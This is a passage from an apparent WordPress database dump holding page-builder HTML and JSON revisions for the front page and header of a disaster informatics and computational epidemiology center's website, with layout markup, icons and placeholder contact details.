h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n        <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',20,'https://gsudice.dataconn.net/?p=1311',0,'revision','',0),(1312,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}},{\"name\":\"hop-button\",\"parentId\":\"22-h29\",\"id\":\"22-h39\",\"partialId\":22,\"styleRef\":679,\"type\":\"header\",\"props\":{\"text\":\"Learn more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}}}],\"parentId\":\"22-h26\",\"id\":\"22-h31\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',23,'https://gsudice.dataconn.net/?p=1312',0,'revision','',0),(1313,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path 